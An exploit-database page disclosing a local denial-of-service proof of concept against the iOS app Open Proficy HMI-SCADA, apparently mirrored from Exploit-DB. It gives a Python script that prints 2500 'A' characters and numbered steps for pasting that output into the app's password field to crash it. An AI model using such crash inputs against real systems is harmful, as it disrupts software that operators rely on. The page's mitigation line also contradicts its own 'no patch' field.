header-logo
Suggest Exploit
vendor:
Open Proficy HMI-SCADA
by:
Luis Martinez
5.5
CVSS
MEDIUM
Denial of Service (DoS) Local
CWE
Product Name: Open Proficy HMI-SCADA
Affected Version From: 5.0.0.25920
Affected Version To: 5.0.0.25920
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: iOS
2019

Open Proficy HMI-SCADA 5.0.0.25920 – ‘Password’ Denial of Service (PoC)

The exploit involves sending a specially crafted password to the Open Proficy HMI-SCADA application, causing it to crash and become unresponsive.

Mitigation:

Update to a patched version of the Open Proficy HMI-SCADA application to prevent the exploit from being successful.
Source

Exploit-DB raw data:

# Exploit Title: Open Proficy HMI-SCADA 5.0.0.25920 - 'Password' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2019-11-16
# Vendor Homepage: https://apps.apple.com/us/app/proficyscada/id525792142
# Software Link: App Store for iOS devices
# GE Intelligent Platforms, Inc.
# Tested Version: 5.0.0.25920
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 7 iOS 13.2

# Steps to Produce the Crash:
# 1.- Run python code: Open_Proficy_HMI-SCADA_for_iOS_5.0.0.25920.py
# 2.- Copy content to clipboard
# 3.- Open "Open Proficy HMI-SCADA for iOS"
# 4.- Host List > "+"
# 5.- Add Host
# 6.- Address Type "IP Address"
# 7.- Host IP Address "192.168.1.1"
# 8.- User Name "l4m5"
# 9.- Paste ClipBoard on "Password"
# 10.- Add
# 11.- Connect
# 12.- Crashed

#!/usr/bin/env python

buffer = "\x41" * 2500
print (buffer)